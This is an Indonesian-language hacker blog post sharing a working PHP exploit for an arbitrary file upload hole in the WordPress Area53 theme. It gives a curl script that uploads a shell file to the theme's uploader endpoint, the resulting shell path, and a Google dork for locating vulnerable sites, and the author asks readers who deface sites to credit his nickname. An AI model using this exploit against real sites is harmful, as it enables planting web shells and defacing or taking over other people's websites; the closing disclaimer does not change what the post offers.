Sunday, October 12, 2014

WordPress Area53 theme Arbitrary File Upload Vulnerability


selamat malam para jones,
kali ini orang paling ganteng sedunia bakalan share exploit wordpress
itung2 untuk para nambah pengetahuan lu semu ;)
langsung liat aja nih exploit nya dibawah :p


###################################################################################################
# Exploit Title: WordPress Area53 theme Arbitrary File Upload Vulnerability
# Author: Byakuya
# Date: 10/19/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/area53-a-responsive-html5-wordpress-theme/2538737
# Affected Version: v1.0.1 - v1.0.5
# Price: $50
# Category: webapps/php
# Google dork: inurl:wp-content/themes/area53/
###################################################################################################
  
# Exploit
  
<?php
$uploadfile = "up.php";
$ch = curl_init(“http://site.com/wordpress/wp-content/themes/area53/framework/_scripts/valums_uploader/php.php”);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array(‘qqfile’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
  
#Shell path: http://site.com/wordpress/wp-content/uploads/2013/10/up.php

KALO LU MAU DEFACE, SAYA MAU TITIP NICK YA
nick gua : N4bil Attacker

0 komentar:

Post a Comment

I just a newbie and student, don't using this article for criminal